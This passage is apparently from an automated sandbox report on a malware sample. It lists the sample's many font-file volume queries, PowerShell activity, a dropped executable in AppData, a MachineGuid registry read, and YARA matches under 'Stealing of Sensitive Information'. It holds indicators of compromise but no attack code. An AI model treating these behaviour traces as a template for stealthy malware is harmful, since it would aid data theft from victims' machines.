            Source: C:\Users\user\Desktop\JeouiaPf03mHSBH.exe | Queries volume information: C:\Windows\Fonts\corbelb.ttf VolumeInformation
            Source: C:\Users\user\Desktop\JeouiaPf03mHSBH.exe | Queries volume information: C:\Windows\Fonts\corbelz.ttf VolumeInformation
            Source: C:\Users\user\Desktop\JeouiaPf03mHSBH.exe | Queries volume information: C:\Windows\Fonts\cour.ttf VolumeInformation
            Source: C:\Users\user\Desktop\JeouiaPf03mHSBH.exe | Queries volume information: C:\Windows\Fonts\couri.ttf VolumeInformation
            Source: C:\Users\user\Desktop\JeouiaPf03mHSBH.exe | Queries volume information: C:\Windows\Fonts\courbd.ttf VolumeInformation
            Source: C:\Users\user\Desktop\JeouiaPf03mHSBH.exe | Queries volume information: C:\Windows\Fonts\courbi.ttf VolumeInformation
            Source: C:\Users\user\Desktop\JeouiaPf03mHSBH.exe | Queries volume information: C:\Windows\Fonts\ebrima.ttf VolumeInformation
            Source: C:\Users\user\Desktop\JeouiaPf03mHSBH.exe | Queries volume information: C:\Windows\Fonts\ebrimabd.ttf VolumeInformation
            Source: C:\Users\user\Desktop\JeouiaPf03mHSBH.exe | Queries volume information: C:\Windows\Fonts\framd.ttf VolumeInformation
            Source: C:\Users\user\Desktop\JeouiaPf03mHSBH.exe | Queries volume information: C:\Windows\Fonts\FRADM.TTF VolumeInformation
            Source: C:\Users\user\Desktop\JeouiaPf03mHSBH.exe | Queries volume information: C:\Windows\Fonts\FRADMIT.TTF VolumeInformation
            Source: C:\Users\user\Desktop\JeouiaPf03mHSBH.exe | Queries volume information: C:\Windows\Fonts\FRAMDCN.TTF VolumeInformation
            Source: C:\Users\user\Desktop\JeouiaPf03mHSBH.exe | Queries volume information: C:\Windows\Fonts\FRADMCN.TTF VolumeInformation
            Source: C:\Users\user\Desktop\JeouiaPf03mHSBH.exe | Queries volume information: C:\Windows\Fonts\Gabriola.ttf VolumeInformation
            Source: C:\Users\user\Desktop\JeouiaPf03mHSBH.exe | Queries volume information: C:\Windows\Fonts\gadugi.ttf VolumeInformation
            Source: C:\Users\user\Desktop\JeouiaPf03mHSBH.exe | Queries volume information: C:\Windows\Fonts\gadugib.ttf VolumeInformation
            Source: C:\Users\user\Desktop\JeouiaPf03mHSBH.exe | Queries volume information: C:\Windows\Fonts\georgia.ttf VolumeInformation
            Source: C:\Users\user\Desktop\JeouiaPf03mHSBH.exe | Queries volume information: C:\Windows\Fonts\georgiai.ttf VolumeInformation
            Source: C:\Users\user\Desktop\JeouiaPf03mHSBH.exe | Queries volume information: C:\Windows\Fonts\georgiab.ttf VolumeInformation
            Source: C:\Users\user\Desktop\JeouiaPf03mHSBH.exe | Queries volume information: C:\Windows\Fonts\georgiaz.ttf VolumeInformation
            Source: C:\Users\user\Desktop\JeouiaPf03mHSBH.exe | Queries volume information: C:\Windows\Fonts\impact.ttf VolumeInformation
            Source: C:\Users\user\Desktop\JeouiaPf03mHSBH.exe | Queries volume information: C:\Windows\Fonts\Inkfree.ttf VolumeInformation
            Source: C:\Users\user\Desktop\JeouiaPf03mHSBH.exe | Queries volume information: C:\Windows\Fonts\javatext.ttf VolumeInformation
            Source: C:\Users\user\Desktop\JeouiaPf03mHSBH.exe | Queries volume information: C:\Windows\Fonts\LeelawUI.ttf VolumeInformation
            Source: C:\Users\user\Desktop\JeouiaPf03mHSBH.exe | Queries volume information: C:\Windows\Fonts\LeelUIsl.ttf VolumeInformation
            Source: C:\Users\user\Desktop\JeouiaPf03mHSBH.exe | Queries volume information: C:\Windows\Fonts\LeelaUIb.ttf VolumeInformation
            Source: C:\Users\user\Desktop\JeouiaPf03mHSBH.exe | Queries volume information: C:\Windows\Fonts\lucon.ttf VolumeInformation
            Source: C:\Users\user\Desktop\JeouiaPf03mHSBH.exe | Queries volume information: C:\Windows\Fonts\l_10646.ttf VolumeInformation
            Source: C:\Users\user\Desktop\JeouiaPf03mHSBH.exe | Queries volume information: C:\Windows\Fonts\malgun.ttf VolumeInformation
            Source: C:\Users\user\Desktop\JeouiaPf03mHSBH.exe | Queries volume information: C:\Windows\Fonts\malgunsl.ttf VolumeInformation
            Source: C:\Users\user\Desktop\JeouiaPf03mHSBH.exe | Queries volume information: C:\Windows\Fonts\malgunbd.ttf VolumeInformation
            Source: C:\Users\user\Desktop\JeouiaPf03mHSBH.exe | Queries volume information: C:\Windows\Fonts\himalaya.ttf VolumeInformation
            Source: C:\Users\user\Desktop\JeouiaPf03mHSBH.exe | Queries volume information: C:\Windows\Fonts\msjh.ttc VolumeInformation
            Source: C:\Users\user\Desktop\JeouiaPf03mHSBH.exe | Queries volume information: C:\Windows\Fonts\msjhl.ttc VolumeInformation
            Source: C:\Users\user\Desktop\JeouiaPf03mHSBH.exe | Queries volume information: C:\Windows\Fonts\msjhbd.ttc VolumeInformation
            Source: C:\Users\user\Desktop\JeouiaPf03mHSBH.exe | Queries volume information: C:\Windows\Fonts\ntailu.ttf VolumeInformation
            Source: C:\Users\user\Desktop\JeouiaPf03mHSBH.exe | Queries volume information: C:\Windows\Fonts\ntailub.ttf VolumeInformation
            Source: C:\Users\user\Desktop\JeouiaPf03mHSBH.exe | Queries volume information: C:\Windows\Fonts\phagspa.ttf VolumeInformation
            Source: C:\Users\user\Desktop\JeouiaPf03mHSBH.exe | Queries volume information: C:\Windows\Fonts\phagspab.ttf VolumeInformation
            Source: C:\Users\user\Desktop\JeouiaPf03mHSBH.exe | Queries volume information: C:\Windows\Fonts\micross.ttf VolumeInformation
            Source: C:\Users\user\Desktop\JeouiaPf03mHSBH.exe | Queries volume information: C:\Windows\Fonts\taile.ttf VolumeInformation
            Source: C:\Users\user\Desktop\JeouiaPf03mHSBH.exe | Queries volume information: C:\Windows\Fonts\taileb.ttf VolumeInformation
            Source: C:\Users\user\Desktop\JeouiaPf03mHSBH.exe | Queries volume information: C:\Windows\Fonts\msyh.ttc VolumeInformation
            Source: C:\Users\user\Desktop\JeouiaPf03mHSBH.exe | Queries volume information: C:\Windows\Fonts\msyhl.ttc VolumeInformation
            Source: C:\Users\user\Desktop\JeouiaPf03mHSBH.exe | Queries volume information: C:\Windows\Fonts\msyhbd.ttc VolumeInformation
            Source: C:\Users\user\Desktop\JeouiaPf03mHSBH.exe | Queries volume information: C:\Windows\Fonts\msyi.ttf VolumeInformation
            Source: C:\Users\user\Desktop\JeouiaPf03mHSBH.exe | Queries volume information: C:\Windows\Fonts\mingliub.ttc VolumeInformation
            Source: C:\Users\user\Desktop\JeouiaPf03mHSBH.exe | Queries volume information: C:\Windows\Fonts\monbaiti.ttf VolumeInformation
            Source: C:\Users\user\Desktop\JeouiaPf03mHSBH.exe | Queries volume information: C:\Windows\Fonts\msgothic.ttc VolumeInformation
            Source: C:\Users\user\Desktop\JeouiaPf03mHSBH.exe | Queries volume information: C:\Windows\Fonts\mvboli.ttf VolumeInformation
            Source: C:\Users\user\Desktop\JeouiaPf03mHSBH.exe | Queries volume information: C:\Windows\Fonts\mmrtext.ttf VolumeInformation
            Source: C:\Users\user\Desktop\JeouiaPf03mHSBH.exe | Queries volume information: C:\Windows\Fonts\mmrtextb.ttf VolumeInformation
            Source: C:\Users\user\Desktop\JeouiaPf03mHSBH.exe | Queries volume information: C:\Windows\Fonts\Nirmala.ttf VolumeInformation
            Source: C:\Users\user\Desktop\JeouiaPf03mHSBH.exe | Queries volume information: C:\Windows\Fonts\NirmalaS.ttf VolumeInformation
            Source: C:\Users\user\Desktop\JeouiaPf03mHSBH.exe | Queries volume information: C:\Windows\Fonts\NirmalaB.ttf VolumeInformation
            Source: C:\Users\user\Desktop\JeouiaPf03mHSBH.exe | Queries volume information: C:\Windows\Fonts\pala.ttf VolumeInformation
            Source: C:\Users\user\Desktop\JeouiaPf03mHSBH.exe | Queries volume information: C:\Windows\Fonts\palai.ttf VolumeInformation
            Source: C:\Users\user\Desktop\JeouiaPf03mHSBH.exe | Queries volume information: C:\Windows\Fonts\palab.ttf VolumeInformation
            Source: C:\Users\user\Desktop\JeouiaPf03mHSBH.exe | Queries volume information: C:\Windows\Fonts\palabi.ttf VolumeInformation
            Source: C:\Users\user\Desktop\JeouiaPf03mHSBH.exe | Queries volume information: C:\Windows\Fonts\segoepr.ttf VolumeInformation
            Source: C:\Users\user\Desktop\JeouiaPf03mHSBH.exe | Queries volume information: C:\Windows\Fonts\segoesc.ttf VolumeInformation
            Source: C:\Users\user\Desktop\JeouiaPf03mHSBH.exe | Queries volume information: C:\Windows\Fonts\segoescb.ttf VolumeInformation
            Source: C:\Users\user\Desktop\JeouiaPf03mHSBH.exe | Queries volume information: C:\Windows\Fonts\seguihis.ttf VolumeInformation
            Source: C:\Users\user\Desktop\JeouiaPf03mHSBH.exe | Queries volume information: C:\Windows\Fonts\simsun.ttc VolumeInformation
            Source: C:\Users\user\Desktop\JeouiaPf03mHSBH.exe | Queries volume information: C:\Windows\Fonts\simsunb.ttf VolumeInformation
            Source: C:\Users\user\Desktop\JeouiaPf03mHSBH.exe | Queries volume information: C:\Windows\Fonts\Sitka.ttc VolumeInformation
            Source: C:\Users\user\Desktop\JeouiaPf03mHSBH.exe | Queries volume information: C:\Windows\Fonts\SitkaI.ttc VolumeInformation
            Source: C:\Users\user\Desktop\JeouiaPf03mHSBH.exe | Queries volume information: C:\Windows\Fonts\SitkaB.ttc VolumeInformation
            Source: C:\Users\user\Desktop\JeouiaPf03mHSBH.exe | Queries volume information: C:\Windows\Fonts\SitkaZ.ttc VolumeInformation
            Source: C:\Users\user\Desktop\JeouiaPf03mHSBH.exe | Queries volume information: C:\Windows\Fonts\sylfaen.ttf VolumeInformation
            Source: C:\Users\user\Desktop\JeouiaPf03mHSBH.exe | Queries volume information: C:\Windows\Fonts\symbol.ttf VolumeInformation
            Source: C:\Users\user\Desktop\JeouiaPf03mHSBH.exe | Queries volume information: C:\Windows\Fonts\tahoma.ttf VolumeInformation
            Source: C:\Users\user\Desktop\JeouiaPf03mHSBH.exe | Queries volume information: C:\Windows\Fonts\tahomabd.ttf VolumeInformation
            Source: C:\Users\user\Desktop\JeouiaPf03mHSBH.exe | Queries volume information: C:\Windows\Fonts\timesi.ttf VolumeInformation
            Source: C:\Users\user\Desktop\JeouiaPf03mHSBH.exe | Queries volume information: C:\Windows\Fonts\timesbd.ttf VolumeInformation
            Source: C:\Users\user\Desktop\JeouiaPf03mHSBH.exe | Queries volume information: C:\Windows\Fonts\timesbi.ttf VolumeInformation
            Source: C:\Users\user\Desktop\JeouiaPf03mHSBH.exe | Queries volume information: C:\Windows\Fonts\trebuc.ttf VolumeInformation
            Source: C:\Users\user\Desktop\JeouiaPf03mHSBH.exe | Queries volume information: C:\Windows\Fonts\trebucit.ttf VolumeInformation
            Source: C:\Users\user\Desktop\JeouiaPf03mHSBH.exe | Queries volume information: C:\Windows\Fonts\trebucbd.ttf VolumeInformation
            Source: C:\Users\user\Desktop\JeouiaPf03mHSBH.exe | Queries volume information: C:\Windows\Fonts\trebucbi.ttf VolumeInformation
            Source: C:\Users\user\Desktop\JeouiaPf03mHSBH.exe | Queries volume information: C:\Windows\Fonts\verdana.ttf VolumeInformation
            Source: C:\Users\user\Desktop\JeouiaPf03mHSBH.exe | Queries volume information: C:\Windows\Fonts\verdanai.ttf VolumeInformation
            Source: C:\Users\user\Desktop\JeouiaPf03mHSBH.exe | Queries volume information: C:\Windows\Fonts\verdanab.ttf VolumeInformation
            Source: C:\Users\user\Desktop\JeouiaPf03mHSBH.exe | Queries volume information: C:\Windows\Fonts\verdanaz.ttf VolumeInformation
            Source: C:\Users\user\Desktop\JeouiaPf03mHSBH.exe | Queries volume information: C:\Windows\Fonts\webdings.ttf VolumeInformation
            Source: C:\Users\user\Desktop\JeouiaPf03mHSBH.exe | Queries volume information: C:\Windows\Fonts\wingding.ttf VolumeInformation
            Source: C:\Users\user\Desktop\JeouiaPf03mHSBH.exe | Queries volume information: C:\Windows\Fonts\YuGothR.ttc VolumeInformation
            Source: C:\Users\user\Desktop\JeouiaPf03mHSBH.exe | Queries volume information: C:\Windows\Fonts\YuGothM.ttc VolumeInformation
            Source: C:\Users\user\Desktop\JeouiaPf03mHSBH.exe | Queries volume information: C:\Windows\Fonts\YuGothL.ttc VolumeInformation
            Source: C:\Users\user\Desktop\JeouiaPf03mHSBH.exe | Queries volume information: C:\Windows\Fonts\YuGothB.ttc VolumeInformation
            Source: C:\Users\user\Desktop\JeouiaPf03mHSBH.exe | Queries volume information: C:\Windows\Fonts\holomdl2.ttf VolumeInformation
            Source: C:\Users\user\Desktop\JeouiaPf03mHSBH.exe | Queries volume information: C:\Windows\Fonts\AGENCYR.TTF VolumeInformation
            Source: C:\Users\user\Desktop\JeouiaPf03mHSBH.exe | Queries volume information: C:\Windows\Fonts\AGENCYB.TTF VolumeInformation
            Source: C:\Users\user\Desktop\JeouiaPf03mHSBH.exe | Queries volume information: C:\Windows\Fonts\ANTQUAB.TTF VolumeInformation
            Source: C:\Users\user\Desktop\JeouiaPf03mHSBH.exe | Queries volume information: C:\Windows\Fonts\ANTQUABI.TTF VolumeInformation
            Source: C:\Users\user\Desktop\JeouiaPf03mHSBH.exe | Queries volume information: C:\Windows\Fonts\BASKVILL.TTF VolumeInformation
            Source: C:\Users\user\Desktop\JeouiaPf03mHSBH.exe | Queries volume information: C:\Windows\Fonts\BELLI.TTF VolumeInformation
            Source: C:\Users\user\Desktop\JeouiaPf03mHSBH.exe | Queries volume information: C:\Windows\Fonts\BERNHC.TTF VolumeInformation
            Source: C:\Users\user\Desktop\JeouiaPf03mHSBH.exe | Queries volume information: C:\Windows\Fonts\BOD_R.TTF VolumeInformation
            Source: C:\Users\user\Desktop\JeouiaPf03mHSBH.exe | Queries volume information: C:\Windows\Fonts\BOD_B.TTF VolumeInformation
            Source: C:\Users\user\Desktop\JeouiaPf03mHSBH.exe | Queries volume information: C:\Windows\Fonts\BOD_CI.TTF VolumeInformation
            Source: C:\Users\user\Desktop\JeouiaPf03mHSBH.exe | Queries volume information: C:\Windows\Fonts\BOD_BLAI.TTF VolumeInformation
            Source: C:\Users\user\Desktop\JeouiaPf03mHSBH.exe | Queries volume information: C:\Windows\Fonts\BOD_CBI.TTF VolumeInformation
            Source: C:\Users\user\Desktop\JeouiaPf03mHSBH.exe | Queries volume information: C:\Windows\Fonts\BOD_PSTC.TTF VolumeInformation
            Source: C:\Users\user\Desktop\JeouiaPf03mHSBH.exe | Queries volume information: C:\Windows\Fonts\BOOKOSI.TTF VolumeInformation
            Source: C:\Users\user\Desktop\JeouiaPf03mHSBH.exe | Queries volume information: C:\Windows\Fonts\BRADHITC.TTF VolumeInformation
            Source: C:\Users\user\Desktop\JeouiaPf03mHSBH.exe | Queries volume information: C:\Windows\Fonts\BRLNSB.TTF VolumeInformation
            Source: C:\Users\user\Desktop\JeouiaPf03mHSBH.exe | Queries volume information: C:\Windows\Fonts\BROADW.TTF VolumeInformation
            Source: C:\Users\user\Desktop\JeouiaPf03mHSBH.exe | Queries volume information: C:\Windows\Fonts\BSSYM7.TTF VolumeInformation
            Source: C:\Users\user\Desktop\JeouiaPf03mHSBH.exe | Queries volume information: C:\Windows\Fonts\CALISTI.TTF VolumeInformation
            Source: C:\Users\user\Desktop\JeouiaPf03mHSBH.exe | Queries volume information: C:\Windows\Fonts\CALISTBI.TTF VolumeInformation
            Source: C:\Users\user\Desktop\JeouiaPf03mHSBH.exe | Queries volume information: C:\Windows\Fonts\CASTELAR.TTF VolumeInformation
            Source: C:\Users\user\Desktop\JeouiaPf03mHSBH.exe | Queries volume information: C:\Windows\Fonts\SCHLBKI.TTF VolumeInformation
            Source: C:\Users\user\Desktop\JeouiaPf03mHSBH.exe | Queries volume information: C:\Windows\Fonts\SCHLBKB.TTF VolumeInformation
            Source: C:\Users\user\Desktop\JeouiaPf03mHSBH.exe | Queries volume information: C:\Windows\Fonts\SCHLBKBI.TTF VolumeInformation
            Source: C:\Users\user\Desktop\JeouiaPf03mHSBH.exe | Queries volume information: C:\Windows\Fonts\CENTAUR.TTF VolumeInformation
            Source: C:\Users\user\Desktop\JeouiaPf03mHSBH.exe | Queries volume information: C:\Windows\Fonts\CENTURY.TTF VolumeInformation
            Source: C:\Users\user\Desktop\JeouiaPf03mHSBH.exe | Queries volume information: C:\Windows\Fonts\COLONNA.TTF VolumeInformation
            Source: C:\Users\user\Desktop\JeouiaPf03mHSBH.exe | Queries volume information: C:\Windows\Fonts\DUBAI-MEDIUM.TTF VolumeInformation
            Source: C:\Users\user\Desktop\JeouiaPf03mHSBH.exe | Queries volume information: C:\Windows\Fonts\DUBAI-BOLD.TTF VolumeInformation
            Source: C:\Users\user\Desktop\JeouiaPf03mHSBH.exe | Queries volume information: C:\Windows\Fonts\ERASMD.TTF VolumeInformation
            Source: C:\Users\user\Desktop\JeouiaPf03mHSBH.exe | Queries volume information: C:\Windows\Fonts\GARA.TTF VolumeInformation
            Source: C:\Users\user\Desktop\JeouiaPf03mHSBH.exe | Queries volume information: C:\Windows\Fonts\GIL_____.TTF VolumeInformation
            Source: C:\Users\user\Desktop\JeouiaPf03mHSBH.exe | Queries volume information: C:\Windows\Fonts\GILI____.TTF VolumeInformation
            Source: C:\Users\user\Desktop\JeouiaPf03mHSBH.exe | Queries volume information: C:\Windows\Fonts\GILB____.TTF VolumeInformation
            Source: C:\Users\user\Desktop\JeouiaPf03mHSBH.exe | Queries volume information: C:\Windows\Fonts\LFAX.TTF VolumeInformation
            Source: C:\Users\user\Desktop\JeouiaPf03mHSBH.exe | Queries volume information: C:\Windows\Fonts\LSANSD.TTF VolumeInformation
            Source: C:\Users\user\Desktop\JeouiaPf03mHSBH.exe | Queries volume information: C:\Windows\Fonts\LSANSDI.TTF VolumeInformation
            Source: C:\Users\user\Desktop\JeouiaPf03mHSBH.exe | Queries volume information: C:\Windows\Fonts\MAGNETOB.TTF VolumeInformation
            Source: C:\Users\user\Desktop\JeouiaPf03mHSBH.exe | Queries volume information: C:\Windows\Fonts\MATURASC.TTF VolumeInformation
            Source: C:\Users\user\Desktop\JeouiaPf03mHSBH.exe | Queries volume information: C:\Windows\Fonts\MSUIGHUR.TTF VolumeInformation
            Source: C:\Users\user\Desktop\JeouiaPf03mHSBH.exe | Queries volume information: C:\Windows\Fonts\MTEXTRA.TTF VolumeInformation
            Source: C:\Users\user\Desktop\JeouiaPf03mHSBH.exe | Queries volume information: C:\Windows\Fonts\OLDENGL.TTF VolumeInformation
            Source: C:\Users\user\Desktop\JeouiaPf03mHSBH.exe | Queries volume information: C:\Windows\Fonts\PERBI___.TTF VolumeInformation
            Source: C:\Users\user\Desktop\JeouiaPf03mHSBH.exe | Queries volume information: C:\Windows\Fonts\RAVIE.TTF VolumeInformation
            Source: C:\Users\user\Desktop\JeouiaPf03mHSBH.exe | Queries volume information: C:\Windows\Fonts\OFFSYMSL.TTF VolumeInformation
            Source: C:\Users\user\Desktop\JeouiaPf03mHSBH.exe | Queries volume information: C:\Windows\Fonts\OFFSYMB.TTF VolumeInformation
            Source: C:\Users\user\Desktop\JeouiaPf03mHSBH.exe | Queries volume information: C:\Windows\Fonts\micross.ttf VolumeInformation
            Source: C:\Users\user\Desktop\JeouiaPf03mHSBH.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.Management.Infrastructure.Native\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.Native.dll VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
            Source: C:\Users\user\AppData\Roaming\snTlRrBza.exeQueries volume information: C:\Users\user\AppData\Roaming\snTlRrBza.exe VolumeInformationJump to behavior
            Source: C:\Users\user\AppData\Roaming\snTlRrBza.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
            Source: C:\Users\user\AppData\Roaming\snTlRrBza.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformationJump to behavior
            Source: C:\Users\user\AppData\Roaming\snTlRrBza.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformationJump to behavior
            Source: C:\Users\user\AppData\Roaming\snTlRrBza.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\JeouiaPf03mHSBH.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

            Stealing of Sensitive Information

            Source: Yara match | File source: 6.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPE
            Source: Yara match | File source: 6.2.RegSvcs.exe.400000.0.raw.unpack, type: UNPACKEDPE
            Source: Yara match | File source: 00000011.00000002.2925725443.0000000002E70000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara match | File source: 00000011.00000002.2925650588.0000000002E20000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara match | File source: 00000006.00000002.2095784893.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
            Source: Yara match | File source: 00000012.00000002.2925371648.00000000031D0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
            Source: Yara match | File source: 00000006.00000002.2097970125.0000000001850000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara match | File source: 00000013.00000002.2448787756.0000000002CF0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
